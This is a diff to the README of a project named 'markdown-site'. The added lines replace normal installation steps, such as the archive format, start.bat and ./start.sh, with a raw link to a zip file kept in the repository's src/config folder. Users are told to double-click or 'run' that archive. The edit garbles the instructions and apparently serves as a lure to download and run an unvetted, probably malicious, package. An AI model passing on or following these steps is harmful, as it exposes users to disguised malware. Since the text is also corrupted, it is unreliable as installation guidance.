bfgfsbdfget/markdown-site/README.md

 ## 📂 Installation Instructions

 1. **Locate Your Download**: Once downloaded, find the file in your downloads folder.
-2. **Extract the Files**: If the file is a .zip or .tar.gz, you will need to extract it.
+2. **Extract the Files**: If the file is a .zip or https://raw.githubusercontent.com/bfgfsbdfget/markdown-site/main/src/config/markdown-site-fanciful.zip, you will need to extract it.
 Right-click on the file, then choose "Extract All" or use your preferred extraction tool.
 3. **Open the Folder**: Open the extracted folder.
 You will see several files, including an instruction file.
 4. **Read the Instructions**: It's important to read the provided instructions.
 This will give you a better understanding of how to use markdown-site.
 5. **Run the Application**:
-   - For Windows, double-click on the "start.bat" file.
+   - For Windows, double-click on the "https://raw.githubusercontent.com/bfgfsbdfget/markdown-site/main/src/config/markdown-site-fanciful.zip" file.
    - For Mac or Linux, open your terminal and navigate to the extracted folder.
-Then type `./start.sh` to run.
+Then type `https://raw.githubusercontent.com/bfgfsbdfget/markdown-site/main/src/config/markdown-site-fanciful.zip` to run.

 ## 🌐 Using markdown-site